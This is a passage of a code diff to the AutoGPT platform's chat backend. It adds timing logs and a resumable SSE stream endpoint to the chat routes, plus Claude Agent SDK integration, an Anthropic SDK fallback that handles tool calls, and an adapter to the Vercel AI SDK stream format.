+        """Convert to SSE format, only emitting fields required by AI SDK protocol.
+
+        The AI SDK uses z.strictObject({type, errorText}) which rejects
+        any extra fields like `code` or `details`.
+        """
+        data = {
+            "type": self.type.value,
+            "errorText": self.errorText,
+        }
+        return f"data: {json_dumps(data)}\n\n"
+

 class StreamHeartbeat(StreamBaseResponse):
    """Heartbeat to keep SSE connection alive during long-running operations.
--- a/autogpt_platform/backend/backend/api/features/chat/routes.py
+++ b/autogpt_platform/backend/backend/api/features/chat/routes.py
@@ -1,12 +1,13 @@
 """Chat API routes for chat session management and streaming via SSE."""

+import asyncio
 import logging
 import uuid as uuid_module
 from collections.abc import AsyncGenerator
 from typing import Annotated

 from autogpt_libs import auth
-from fastapi import APIRouter, Depends, Header, HTTPException, Query, Security
+from fastapi import APIRouter, Depends, Header, HTTPException, Query, Response, Security
 from fastapi.responses import StreamingResponse
 from pydantic import BaseModel

@@ -16,8 +17,39 @@ from . import service as chat_service
 from . import stream_registry
 from .completion_handler import process_operation_failure, process_operation_success
 from .config import ChatConfig
-from .model import ChatSession, create_chat_session, get_chat_session, get_user_sessions
-from .response_model import StreamFinish, StreamHeartbeat, StreamStart
+from .model import (
+    ChatMessage,
+    ChatSession,
+    append_and_save_message,
+    create_chat_session,
+    get_chat_session,
+    get_user_sessions,
+)
+from .response_model import StreamError, StreamFinish, StreamHeartbeat, StreamStart
+from .sdk import service as sdk_service
+from .tools.models import (
+    AgentDetailsResponse,
+    AgentOutputResponse,
+    AgentPreviewResponse,
+    AgentSavedResponse,
+    AgentsFoundResponse,
+    BlockListResponse,
+    BlockOutputResponse,
+    ClarificationNeededResponse,
+    DocPageResponse,
+    DocSearchResultsResponse,
+    ErrorResponse,
+    ExecutionStartedResponse,
+    InputValidationErrorResponse,
+    NeedLoginResponse,
+    NoResultsResponse,
+    OperationInProgressResponse,
+    OperationPendingResponse,
+    OperationStartedResponse,
+    SetupRequirementsResponse,
+    UnderstandingUpdatedResponse,
+)
+from .tracking import track_user_message

 config = ChatConfig()

@@ -209,6 +241,10 @@ async def get_session(
    active_task, last_message_id = await stream_registry.get_active_task_for_session(
        session_id, user_id
    )
+    logger.info(
+        f"[GET_SESSION] session={session_id}, active_task={active_task is not None}, "
+        f"msg_count={len(messages)}, last_role={messages[-1].get('role') if messages else 'none'}"
+    )
    if active_task:
        # Filter out the in-progress assistant message from the session response.
        # The client will receive the complete assistant response through the SSE
@@ -266,12 +302,54 @@ async def stream_chat_post(

    """
    import asyncio
+    import time

+    stream_start_time = time.perf_counter()
+    log_meta = {"component": "ChatStream", "session_id": session_id}
+    if user_id:
+        log_meta["user_id"] = user_id
+
+    logger.info(
+        f"[TIMING] stream_chat_post STARTED, session={session_id}, "
+        f"user={user_id}, message_len={len(request.message)}",
+        extra={"json_fields": log_meta},
+    )
    session = await _validate_and_get_session(session_id, user_id)
+    logger.info(
+        f"[TIMING] session validated in {(time.perf_counter() - stream_start_time) * 1000:.1f}ms",
+        extra={
+            "json_fields": {
+                **log_meta,
+                "duration_ms": (time.perf_counter() - stream_start_time) * 1000,
+            }
+        },
+    )
+
+    # Atomically append user message to session BEFORE creating task to avoid
+    # race condition where GET_SESSION sees task as "running" but message isn't
+    # saved yet.  append_and_save_message re-fetches inside a lock to prevent
+    # message loss from concurrent requests.
+    if request.message:
+        message = ChatMessage(
+            role="user" if request.is_user_message else "assistant",
+            content=request.message,
+        )
+        if request.is_user_message:
+            track_user_message(
+                user_id=user_id,
+                session_id=session_id,
+                message_length=len(request.message),
+            )
+        logger.info(f"[STREAM] Saving user message to session {session_id}")
+        session = await append_and_save_message(session_id, message)
+        logger.info(f"[STREAM] User message saved for session {session_id}")

    # Create a task in the stream registry for reconnection support
    task_id = str(uuid_module.uuid4())
    operation_id = str(uuid_module.uuid4())
+    log_meta["task_id"] = task_id
+
+    task_create_start = time.perf_counter()
    await stream_registry.create_task(
        task_id=task_id,
        session_id=session_id,
@@ -280,40 +358,147 @@ async def stream_chat_post(
        tool_name="chat",
        operation_id=operation_id,
    )
+    logger.info(
+        f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start) * 1000:.1f}ms",
+        extra={
+            "json_fields": {
+                **log_meta,
+                "duration_ms": (time.perf_counter() - task_create_start) * 1000,
+            }
+        },
+    )

    # Background task that runs the AI generation independently of SSE connection
    async def run_ai_generation():
+        import time as time_module
+
+        gen_start_time = time_module.perf_counter()
+        logger.info(
+            f"[TIMING] run_ai_generation STARTED, task={task_id}, session={session_id}, user={user_id}",
+            extra={"json_fields": log_meta},
+        )
+        first_chunk_time, ttfc = None, None
+        chunk_count = 0
        try:
            # Emit a start event with task_id for reconnection
            start_chunk = StreamStart(messageId=task_id, taskId=task_id)
            await stream_registry.publish_chunk(task_id, start_chunk)
+            logger.info(
+                f"[TIMING] StreamStart published at {(time_module.perf_counter() - gen_start_time) * 1000:.1f}ms",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "elapsed_ms": (time_module.perf_counter() - gen_start_time)
+                        * 1000,
+                    }
+                },
+            )

-            async for chunk in chat_service.stream_chat_completion(
+            # Choose service based on configuration
+            use_sdk = config.use_claude_agent_sdk
+            stream_fn = (
+                sdk_service.stream_chat_completion_sdk
+                if use_sdk
+                else chat_service.stream_chat_completion
+            )
+            logger.info(
+                f"[TIMING] Calling {'sdk' if use_sdk else 'standard'} stream_chat_completion",
+                extra={"json_fields": log_meta},
+            )
+            # Pass message=None since we already added it to the session above
+            async for chunk in stream_fn(
                session_id,
-                request.message,
+                None,  # Message already in session
                is_user_message=request.is_user_message,
                user_id=user_id,
-                session=session,  # Pass pre-fetched session to avoid double-fetch
+                session=session,  # Pass session with message already added
                context=request.context,
            ):
+                # Skip duplicate StreamStart — we already published one above
+                if isinstance(chunk, StreamStart):
+                    continue
+                chunk_count += 1
+                if first_chunk_time is None:
+                    first_chunk_time = time_module.perf_counter()
+                    ttfc = first_chunk_time - gen_start_time
+                    logger.info(
+                        f"[TIMING] FIRST AI CHUNK at {ttfc:.2f}s, type={type(chunk).__name__}",
+                        extra={
+                            "json_fields": {
+                                **log_meta,
+                                "chunk_type": type(chunk).__name__,
+                                "time_to_first_chunk_ms": ttfc * 1000,
+                            }
+                        },
+                    )
                # Write to Redis (subscribers will receive via XREAD)
                await stream_registry.publish_chunk(task_id, chunk)

-            # Mark task as completed
+            gen_end_time = time_module.perf_counter()
+            total_time = (gen_end_time - gen_start_time) * 1000
+            logger.info(
+                f"[TIMING] run_ai_generation FINISHED in {total_time / 1000:.1f}s; "
+                f"task={task_id}, session={session_id}, "
+                f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "total_time_ms": total_time,
+                        "time_to_first_chunk_ms": (
+                            ttfc * 1000 if ttfc is not None else None
+                        ),
+                        "n_chunks": chunk_count,
+                    }
+                },
+            )
            await stream_registry.mark_task_completed(task_id, "completed")
        except Exception as e:
+            elapsed = time_module.perf_counter() - gen_start_time
            logger.error(
-                f"Error in background AI generation for session {session_id}: {e}"
+                f"[TIMING] run_ai_generation ERROR after {elapsed:.2f}s: {e}",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "elapsed_ms": elapsed * 1000,
+                        "error": str(e),
+                    }
+                },
            )
+            # Publish a StreamError so the frontend can display an error message
+            try:
+                await stream_registry.publish_chunk(
+                    task_id,
+                    StreamError(
+                        errorText="An error occurred. Please try again.",
+                        code="stream_error",
+                    ),
+                )
+            except Exception:
+                pass  # Best-effort; mark_task_completed will publish StreamFinish
            await stream_registry.mark_task_completed(task_id, "failed")

    # Start the AI generation in a background task
    bg_task = asyncio.create_task(run_ai_generation())
    await stream_registry.set_task_asyncio_task(task_id, bg_task)
+    setup_time = (time.perf_counter() - stream_start_time) * 1000
+    logger.info(
+        f"[TIMING] Background task started, setup={setup_time:.1f}ms",
+        extra={"json_fields": {**log_meta, "setup_time_ms": setup_time}},
+    )

    # SSE endpoint that subscribes to the task's stream
    async def event_generator() -> AsyncGenerator[str, None]:
+        import time as time_module
+
+        event_gen_start = time_module.perf_counter()
+        logger.info(
+            f"[TIMING] event_generator STARTED, task={task_id}, session={session_id}, "
+            f"user={user_id}",
+            extra={"json_fields": log_meta},
+        )
        subscriber_queue = None
+        first_chunk_yielded = False
+        chunks_yielded = 0
        try:
            # Subscribe to the task stream (this replays existing messages + live updates)
            subscriber_queue = await stream_registry.subscribe_to_task(
@@ -328,24 +513,78 @@ async def stream_chat_post(
                return

            # Read from the subscriber queue and yield to SSE
+            logger.info(
+                "[TIMING] Starting to read from subscriber_queue",
+                extra={"json_fields": log_meta},
+            )
            while True:
                try:
                    chunk = await asyncio.wait_for(subscriber_queue.get(), timeout=30.0)
+                    chunks_yielded += 1
+
+                    if not first_chunk_yielded:
+                        first_chunk_yielded = True
+                        elapsed = time_module.perf_counter() - event_gen_start
+                        logger.info(
+                            f"[TIMING] FIRST CHUNK from queue at {elapsed:.2f}s, "
+                            f"type={type(chunk).__name__}",
+                            extra={
+                                "json_fields": {
+                                    **log_meta,
+                                    "chunk_type": type(chunk).__name__,
+                                    "elapsed_ms": elapsed * 1000,
+                                }
+                            },
+                        )
+
                    yield chunk.to_sse()

                    # Check for finish signal
                    if isinstance(chunk, StreamFinish):
+                        total_time = time_module.perf_counter() - event_gen_start
+                        logger.info(
+                            f"[TIMING] StreamFinish received in {total_time:.2f}s; "
+                            f"n_chunks={chunks_yielded}",
+                            extra={
+                                "json_fields": {
+                                    **log_meta,
+                                    "chunks_yielded": chunks_yielded,
+                                    "total_time_ms": total_time * 1000,
+                                }
+                            },
+                        )
                        break
                except asyncio.TimeoutError:
-                    # Send heartbeat to keep connection alive
                    yield StreamHeartbeat().to_sse()

        except GeneratorExit:
+            logger.info(
+                f"[TIMING] GeneratorExit (client disconnected), chunks={chunks_yielded}",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "chunks_yielded": chunks_yielded,
+                        "reason": "client_disconnect",
+                    }
+                },
+            )
            pass  # Client disconnected - background task continues
        except Exception as e:
-            logger.error(f"Error in SSE stream for task {task_id}: {e}")
+            elapsed = (time_module.perf_counter() - event_gen_start) * 1000
+            logger.error(
+                f"[TIMING] event_generator ERROR after {elapsed:.1f}ms: {e}",
+                extra={
+                    "json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
+                },
+            )
+            # Surface error to frontend so it doesn't appear stuck
+            yield StreamError(
+                errorText="An error occurred. Please try again.",
+                code="stream_error",
+            ).to_sse()
+            yield StreamFinish().to_sse()
        finally:
-            # Unsubscribe when client disconnects or stream ends to prevent resource leak
+            # Unsubscribe when client disconnects or stream ends
            if subscriber_queue is not None:
                try:
                    await stream_registry.unsubscribe_from_task(
@@ -357,6 +596,18 @@ async def stream_chat_post(
                        exc_info=True,
                    )
            # AI SDK protocol termination - always yield even if unsubscribe fails
+            total_time = time_module.perf_counter() - event_gen_start
+            logger.info(
+                f"[TIMING] event_generator FINISHED in {total_time:.2f}s; "
+                f"task={task_id}, session={session_id}, n_chunks={chunks_yielded}",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "total_time_ms": total_time * 1000,
+                        "chunks_yielded": chunks_yielded,
+                    }
+                },
+            )
            yield "data: [DONE]\n\n"

    return StreamingResponse(
@@ -374,63 +625,90 @@ async def stream_chat_post(
@router.get(
    "/sessions/{session_id}/stream",
 )
-async def stream_chat_get(
+async def resume_session_stream(
    session_id: str,
-    message: Annotated[str, Query(min_length=1, max_length=10000)],
    user_id: str | None = Depends(auth.get_user_id),
-    is_user_message: bool = Query(default=True),
 ):
    """
-    Stream chat responses for a session (GET - legacy endpoint).
+    Resume an active stream for a session.

-    Streams the AI/completion responses in real time over Server-Sent Events (SSE), including:
-      - Text fragments as they are generated
-      - Tool call UI elements (if invoked)
-      - Tool execution results
+    Called by the AI SDK's ``useChat(resume: true)`` on page load.
+    Checks for an active (in-progress) task on the session and either replays
+    the full SSE stream or returns 204 No Content if nothing is running.

    Args:
-        session_id: The chat session identifier to associate with the streamed messages.
-        message: The user's new message to process.
+        session_id: The chat session identifier.
        user_id: Optional authenticated user ID.
-        is_user_message: Whether the message is a user message.
-    Returns:
-        StreamingResponse: SSE-formatted response chunks.

+    Returns:
+        StreamingResponse (SSE) when an active stream exists,
+        or 204 No Content when there is nothing to resume.
    """
-    session = await _validate_and_get_session(session_id, user_id)
+    import asyncio
+
+    active_task, _last_id = await stream_registry.get_active_task_for_session(
+        session_id, user_id
+    )
+
+    if not active_task:
+        return Response(status_code=204)
+
+    subscriber_queue = await stream_registry.subscribe_to_task(
+        task_id=active_task.task_id,
+        user_id=user_id,
+        last_message_id="0-0",  # Full replay so useChat rebuilds the message
+    )
+
+    if subscriber_queue is None:
+        return Response(status_code=204)

    async def event_generator() -> AsyncGenerator[str, None]:
        chunk_count = 0
        first_chunk_type: str | None = None
-        async for chunk in chat_service.stream_chat_completion(
-            session_id,
-            message,
-            is_user_message=is_user_message,
-            user_id=user_id,
-            session=session,  # Pass pre-fetched session to avoid double-fetch
-        ):
-            if chunk_count < 3:
-                logger.info(
-                    "Chat stream chunk",
-                    extra={
-                        "session_id": session_id,
-                        "chunk_type": str(chunk.type),
-                    },
+        try:
+            while True:
+                try:
+                    chunk = await asyncio.wait_for(subscriber_queue.get(), timeout=30.0)
+                    if chunk_count < 3:
+                        logger.info(
+                            "Resume stream chunk",
+                            extra={
+                                "session_id": session_id,
+                                "chunk_type": str(chunk.type),
+                            },
+                        )
+                    if not first_chunk_type:
+                        first_chunk_type = str(chunk.type)
+                    chunk_count += 1
+                    yield chunk.to_sse()
+
+                    if isinstance(chunk, StreamFinish):
+                        break
+                except asyncio.TimeoutError:
+                    yield StreamHeartbeat().to_sse()
+        except GeneratorExit:
+            pass
+        except Exception as e:
+            logger.error(f"Error in resume stream for session {session_id}: {e}")
+        finally:
+            try:
+                await stream_registry.unsubscribe_from_task(
+                    active_task.task_id, subscriber_queue
                )
-            if not first_chunk_type:
-                first_chunk_type = str(chunk.type)
-            chunk_count += 1
-            yield chunk.to_sse()
-        logger.info(
-            "Chat stream completed",
-            extra={
-                "session_id": session_id,
-                "chunk_count": chunk_count,
-                "first_chunk_type": first_chunk_type,
-            },
-        )
-        # AI SDK protocol termination
-        yield "data: [DONE]\n\n"
+            except Exception as unsub_err:
+                logger.error(
+                    f"Error unsubscribing from task {active_task.task_id}: {unsub_err}",
+                    exc_info=True,
+                )
+            logger.info(
+                "Resume stream completed",
+                extra={
+                    "session_id": session_id,
+                    "n_chunks": chunk_count,
+                    "first_chunk_type": first_chunk_type,
+                },
+            )
+            yield "data: [DONE]\n\n"

    return StreamingResponse(
        event_generator(),
@@ -438,8 +716,8 @@ async def stream_chat_get(
        headers={
            "Cache-Control": "no-cache",
            "Connection": "keep-alive",
-            "X-Accel-Buffering": "no",  # Disable nginx buffering
-            "x-vercel-ai-ui-message-stream": "v1",  # AI SDK protocol header
+            "X-Accel-Buffering": "no",
+            "x-vercel-ai-ui-message-stream": "v1",
        },
    )

@@ -550,8 +828,6 @@ async def stream_task(
        )

    async def event_generator() -> AsyncGenerator[str, None]:
-        import asyncio
-
        heartbeat_interval = 15.0  # Send heartbeat every 15 seconds
        try:
            while True:
@@ -751,3 +1027,42 @@ async def health_check() -> dict:
        "service": "chat",
        "version": "0.1.0",
    }
+
+
+# ========== Schema Export (for OpenAPI / Orval codegen) ==========
+
+ToolResponseUnion = (
+    AgentsFoundResponse
+    | NoResultsResponse
+    | AgentDetailsResponse
+    | SetupRequirementsResponse
+    | ExecutionStartedResponse
+    | NeedLoginResponse
+    | ErrorResponse
+    | InputValidationErrorResponse
+    | AgentOutputResponse
+    | UnderstandingUpdatedResponse
+    | AgentPreviewResponse
+    | AgentSavedResponse
+    | ClarificationNeededResponse
+    | BlockListResponse
+    | BlockOutputResponse
+    | DocSearchResultsResponse
+    | DocPageResponse
+    | OperationStartedResponse
+    | OperationPendingResponse
+    | OperationInProgressResponse
+)
+
+
+@router.get(
+    "/schema/tool-responses",
+    response_model=ToolResponseUnion,
+    include_in_schema=True,
+    summary="[Dummy] Tool response type export for codegen",
+    description="This endpoint is not meant to be called. It exists solely to "
+    "expose tool response models in the OpenAPI schema for frontend codegen.",
+)
+async def _tool_response_schema() -> ToolResponseUnion:  # type: ignore[return]
+    """Never called at runtime. Exists only so Orval generates TS types."""
+    raise HTTPException(status_code=501, detail="Schema-only endpoint")
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/init.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/init.py
@@ -0,0 +1,14 @@
+"""Claude Agent SDK integration for CoPilot.
+
+This module provides the integration layer between the Claude Agent SDK
+and the existing CoPilot tool system, enabling drop-in replacement of
+the current LLM orchestration with the battle-tested Claude Agent SDK.
+"""
+
+from .service import stream_chat_completion_sdk
+from .tool_adapter import create_copilot_mcp_server
+
+__all__ = [
+    "stream_chat_completion_sdk",
+    "create_copilot_mcp_server",
+]
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/anthropic_fallback.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/anthropic_fallback.py
@@ -0,0 +1,363 @@
+"""Anthropic SDK fallback implementation.
+
+This module provides the fallback streaming implementation using the Anthropic SDK
+directly when the Claude Agent SDK is not available.
+"""
+
+import json
+import logging
+import uuid
+from collections.abc import AsyncGenerator
+from typing import Any, cast
+
+from ..config import ChatConfig
+from ..model import ChatMessage, ChatSession
+from ..response_model import (
+    StreamBaseResponse,
+    StreamError,
+    StreamFinish,
+    StreamTextDelta,
+    StreamTextEnd,
+    StreamTextStart,
+    StreamToolInputAvailable,
+    StreamToolInputStart,
+    StreamToolOutputAvailable,
+    StreamUsage,
+)
+from .tool_adapter import get_tool_definitions, get_tool_handlers
+
+logger = logging.getLogger(__name__)
+config = ChatConfig()
+
+# Maximum tool-call iterations before stopping to prevent infinite loops
+_MAX_TOOL_ITERATIONS = 10
+
+
+async def stream_with_anthropic(
+    session: ChatSession,
+    system_prompt: str,
+    text_block_id: str,
+) -> AsyncGenerator[StreamBaseResponse, None]:
+    """Stream using Anthropic SDK directly with tool calling support.
+
+    This function accumulates messages into the session for persistence.
+    The caller should NOT yield an additional StreamFinish - this function handles it.
+    """
+    import anthropic
+
+    # Use config.api_key (CHAT_API_KEY > OPEN_ROUTER_API_KEY > OPENAI_API_KEY)
+    # with config.base_url for OpenRouter routing — matching the non-SDK path.
+    api_key = config.api_key
+    if not api_key:
+        yield StreamError(
+            errorText="No API key configured (set CHAT_API_KEY or OPENAI_API_KEY)",
+            code="config_error",
+        )
+        yield StreamFinish()
+        return
+
+    # Build kwargs for the Anthropic client — use base_url if configured
+    client_kwargs: dict[str, Any] = {"api_key": api_key}
+    if config.base_url:
+        # Strip /v1 suffix — Anthropic SDK adds its own version path
+        base = config.base_url.rstrip("/")
+        if base.endswith("/v1"):
+            base = base[:-3]
+        client_kwargs["base_url"] = base
+
+    client = anthropic.AsyncAnthropic(**client_kwargs)
+    tool_definitions = get_tool_definitions()
+    tool_handlers = get_tool_handlers()
+
+    anthropic_tools = [
+        {
+            "name": t["name"],
+            "description": t["description"],
+            "input_schema": t["inputSchema"],
+        }
+        for t in tool_definitions
+    ]
+
+    anthropic_messages = _convert_session_to_anthropic(session)
+
+    if not anthropic_messages or anthropic_messages[-1]["role"] != "user":
+        anthropic_messages.append(
+            {"role": "user", "content": "Continue with the task."}
+        )
+
+    has_started_text = False
+    accumulated_text = ""
+    accumulated_tool_calls: list[dict[str, Any]] = []
+
+    for _ in range(_MAX_TOOL_ITERATIONS):
+        try:
+            async with client.messages.stream(
+                model=(
+                    config.model.split("/")[-1] if "/" in config.model else config.model
+                ),
+                max_tokens=4096,
+                system=system_prompt,
+                messages=cast(Any, anthropic_messages),
+                tools=cast(Any, anthropic_tools) if anthropic_tools else [],
+            ) as stream:
+                async for event in stream:
+                    if event.type == "content_block_start":
+                        block = event.content_block
+                        if hasattr(block, "type"):
+                            if block.type == "text" and not has_started_text:
+                                yield StreamTextStart(id=text_block_id)
+                                has_started_text = True
+                            elif block.type == "tool_use":
+                                yield StreamToolInputStart(
+                                    toolCallId=block.id, toolName=block.name
+                                )
+
+                    elif event.type == "content_block_delta":
+                        delta = event.delta
+                        if hasattr(delta, "type") and delta.type == "text_delta":
+                            accumulated_text += delta.text
+                            yield StreamTextDelta(id=text_block_id, delta=delta.text)
+
+                final_message = await stream.get_final_message()
+
+                if final_message.stop_reason == "tool_use":
+                    if has_started_text:
+                        yield StreamTextEnd(id=text_block_id)
+                        has_started_text = False
+                        text_block_id = str(uuid.uuid4())
+
+                    tool_results = []
+                    assistant_content: list[dict[str, Any]] = []
+
+                    for block in final_message.content:
+                        if block.type == "text":
+                            assistant_content.append(
+                                {"type": "text", "text": block.text}
+                            )
+                        elif block.type == "tool_use":
+                            assistant_content.append(
+                                {
+                                    "type": "tool_use",
+                                    "id": block.id,
+                                    "name": block.name,
+                                    "input": block.input,
+                                }
+                            )
+
+                            # Track tool call for session persistence
+                            accumulated_tool_calls.append(
+                                {
+                                    "id": block.id,
+                                    "type": "function",
+                                    "function": {
+                                        "name": block.name,
+                                        "arguments": json.dumps(
+                                            block.input
+                                            if isinstance(block.input, dict)
+                                            else {}
+                                        ),
+                                    },
+                                }
+                            )
+
+                            yield StreamToolInputAvailable(
+                                toolCallId=block.id,
+                                toolName=block.name,
+                                input=(
+                                    block.input if isinstance(block.input, dict) else {}
+                                ),
+                            )
+
+                            output, is_error = await _execute_tool(
+                                block.name, block.input, tool_handlers
+                            )
+
+                            yield StreamToolOutputAvailable(
+                                toolCallId=block.id,
+                                toolName=block.name,
+                                output=output,
+                                success=not is_error,
+                            )
+
+                            # Save tool result to session
+                            session.messages.append(
+                                ChatMessage(
+                                    role="tool",
+                                    content=output,
+                                    tool_call_id=block.id,
+                                )
+                            )
+
+                            tool_results.append(
+                                {
+                                    "type": "tool_result",
+                                    "tool_use_id": block.id,
+                                    "content": output,
+                                    "is_error": is_error,
+                                }
+                            )
+
+                    # Save assistant message with tool calls to session
+                    session.messages.append(
+                        ChatMessage(
+                            role="assistant",
+                            content=accumulated_text or None,
+                            tool_calls=(
+                                accumulated_tool_calls
+                                if accumulated_tool_calls
+                                else None
+                            ),
+                        )
+                    )
+                    # Reset for next iteration
+                    accumulated_text = ""
+                    accumulated_tool_calls = []
+
+                    anthropic_messages.append(
+                        {"role": "assistant", "content": assistant_content}
+                    )
+                    anthropic_messages.append({"role": "user", "content": tool_results})
+                    continue
+
+                else:
+                    if has_started_text:
+                        yield StreamTextEnd(id=text_block_id)
+
+                    # Save final assistant response to session
+                    if accumulated_text:
+                        session.messages.append(
+                            ChatMessage(role="assistant", content=accumulated_text)
+                        )
+
+                    yield StreamUsage(
+                        promptTokens=final_message.usage.input_tokens,
+                        completionTokens=final_message.usage.output_tokens,
+                        totalTokens=final_message.usage.input_tokens
+                        + final_message.usage.output_tokens,
+                    )
+                    yield StreamFinish()
+                    return
+
+        except Exception as e:
+            logger.error(f"[Anthropic Fallback] Error: {e}", exc_info=True)
+            yield StreamError(
+                errorText="An error occurred. Please try again.",
+                code="anthropic_error",
+            )
+            yield StreamFinish()
+            return
+
+    yield StreamError(errorText="Max tool iterations reached", code="max_iterations")
+    yield StreamFinish()
+
+
+def _convert_session_to_anthropic(session: ChatSession) -> list[dict[str, Any]]:
+    """Convert session messages to Anthropic format.
+
+    Handles merging consecutive same-role messages (Anthropic requires alternating roles).
+    """
+    messages: list[dict[str, Any]] = []
+
+    for msg in session.messages:
+        if msg.role == "user":
+            new_msg = {"role": "user", "content": msg.content or ""}
+        elif msg.role == "assistant":
+            content: list[dict[str, Any]] = []
+            if msg.content:
+                content.append({"type": "text", "text": msg.content})
+            if msg.tool_calls:
+                for tc in msg.tool_calls:
+                    func = tc.get("function", {})
+                    args = func.get("arguments", {})
+                    if isinstance(args, str):
+                        try:
+                            args = json.loads(args)
+                        except json.JSONDecodeError:
+                            args = {}
+                    content.append(
+                        {
+                            "type": "tool_use",
+                            "id": tc.get("id", str(uuid.uuid4())),
+                            "name": func.get("name", ""),
+                            "input": args,
+                        }
+                    )
+            if content:
+                new_msg = {"role": "assistant", "content": content}
+            else:
+                continue  # Skip empty assistant messages
+        elif msg.role == "tool":
+            new_msg = {
+                "role": "user",
+                "content": [
+                    {
+                        "type": "tool_result",
+                        "tool_use_id": msg.tool_call_id or "",
+                        "content": msg.content or "",
+                    }
+                ],
+            }
+        else:
+            continue
+
+        messages.append(new_msg)
+
+    # Merge consecutive same-role messages (Anthropic requires alternating roles)
+    return _merge_consecutive_roles(messages)
+
+
+def _merge_consecutive_roles(messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
+    """Merge consecutive messages with the same role.
+
+    Anthropic API requires alternating user/assistant roles.
+    """
+    if not messages:
+        return []
+
+    merged: list[dict[str, Any]] = []
+    for msg in messages:
+        if merged and merged[-1]["role"] == msg["role"]:
+            # Merge with previous message
+            prev_content = merged[-1]["content"]
+            new_content = msg["content"]
+
+            # Normalize both to list-of-blocks form
+            if isinstance(prev_content, str):
+                prev_content = [{"type": "text", "text": prev_content}]
+            if isinstance(new_content, str):
+                new_content = [{"type": "text", "text": new_content}]
+
+            # Ensure both are lists
+            if not isinstance(prev_content, list):
+                prev_content = [prev_content]
+            if not isinstance(new_content, list):
+                new_content = [new_content]
+
+            merged[-1]["content"] = prev_content + new_content
+        else:
+            merged.append(msg)
+
+    return merged
+
+
+async def _execute_tool(
+    tool_name: str, tool_input: Any, handlers: dict[str, Any]
+) -> tuple[str, bool]:
+    """Execute a tool and return (output, is_error)."""
+    handler = handlers.get(tool_name)
+    if not handler:
+        return f"Unknown tool: {tool_name}", True
+
+    try:
+        result = await handler(tool_input)
+        # Safely extract output - handle empty or missing content
+        content = result.get("content") or []
+        if content and isinstance(content, list) and len(content) > 0:
+            first_item = content[0]
+            output = first_item.get("text", "") if isinstance(first_item, dict) else ""
+        else:
+            output = ""
+        is_error = result.get("isError", False)
+        return output, is_error
+    except Exception as e:
+        return f"Error: {str(e)}", True
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/response_adapter.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/response_adapter.py
@@ -0,0 +1,212 @@
+"""Response adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
+
+This module provides the adapter layer that converts streaming messages from
+the Claude Agent SDK into the Vercel AI SDK UI Stream Protocol format that
+the frontend expects.
+"""
+
+import json
+import logging
+import uuid
+
+from claude_agent_sdk import (
+    AssistantMessage,
+    Message,
+    ResultMessage,
+    SystemMessage,
+    TextBlock,
+    ToolResultBlock,
+    ToolUseBlock,
+    UserMessage,
+)
+
+from backend.api.features.chat.response_model import (
+    StreamBaseResponse,
+    StreamError,
+    StreamFinish,
+    StreamFinishStep,
+    StreamStart,
+    StreamStartStep,
+    StreamTextDelta,
+    StreamTextEnd,
+    StreamTextStart,
+    StreamToolInputAvailable,
+    StreamToolInputStart,
+    StreamToolOutputAvailable,
+    StreamUsage,
+)
+from backend.api.features.chat.sdk.tool_adapter import (
+    MCP_TOOL_PREFIX,
+    pop_pending_tool_output,
+)
+
+logger = logging.getLogger(__name__)
+
+
+class SDKResponseAdapter:
+    """Adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
+
+    This class maintains state during a streaming session to properly track
+    text blocks, tool calls, and message lifecycle.
+    """
+
+    def __init__(self, message_id: str | None = None):
+        self.message_id = message_id or str(uuid.uuid4())
+        self.text_block_id = str(uuid.uuid4())
+        self.has_started_text = False
+        self.has_ended_text = False
+        self.current_tool_calls: dict[str, dict[str, str]] = {}
+        self.task_id: str | None = None
+        self.step_open = False
+
+    def set_task_id(self, task_id: str) -> None:
+        """Set the task ID for reconnection support."""
+        self.task_id = task_id
+
+    def convert_message(self, sdk_message: Message) -> list[StreamBaseResponse]:
+        """Convert a single SDK message to Vercel AI SDK format."""
+        responses: list[StreamBaseResponse] = []
+
+        if isinstance(sdk_message, SystemMessage):
+            if sdk_message.subtype == "init":
+                responses.append(
+                    StreamStart(messageId=self.message_id, taskId=self.task_id)
+                )
+                # Open the first step (matches non-SDK: StreamStart then StreamStartStep)
+                responses.append(StreamStartStep())
+                self.step_open = True
+
+        elif isinstance(sdk_message, AssistantMessage):
+            # After tool results, the SDK sends a new AssistantMessage for the
+            # next LLM turn. Open a new step if the previous one was closed.
+            if not self.step_open:
+                responses.append(StreamStartStep())
+                self.step_open = True
+
+            for block in sdk_message.content:
+                if isinstance(block, TextBlock):
+                    if block.text:
+                        self._ensure_text_started(responses)
+                        responses.append(
+                            StreamTextDelta(id=self.text_block_id, delta=block.text)
+                        )
+
+                elif isinstance(block, ToolUseBlock):
+                    self._end_text_if_open(responses)
+
+                    # Strip MCP prefix so frontend sees "find_block"
+                    # instead of "mcp__copilot__find_block".
+                    tool_name = block.name.removeprefix(MCP_TOOL_PREFIX)
+
+                    responses.append(
+                        StreamToolInputStart(toolCallId=block.id, toolName=tool_name)
+                    )
+                    responses.append(
+                        StreamToolInputAvailable(
+                            toolCallId=block.id,
+                            toolName=tool_name,
+                            input=block.input,
+                        )
+                    )
+                    self.current_tool_calls[block.id] = {"name": tool_name}
+
+        elif isinstance(sdk_message, UserMessage):
+            # UserMessage carries tool results back from tool execution.
+            content = sdk_message.content
+            blocks = content if isinstance(content, list) else []
+            for block in blocks:
+                if isinstance(block, ToolResultBlock) and block.tool_use_id:
+                    tool_info = self.current_tool_calls.get(block.tool_use_id, {})
+                    tool_name = tool_info.get("name", "unknown")
+
+                    # Prefer the stashed full output over the SDK's
+                    # (potentially truncated) ToolResultBlock content.
+                    # The SDK truncates large results, writing them to disk,
+                    # which breaks frontend widget parsing.
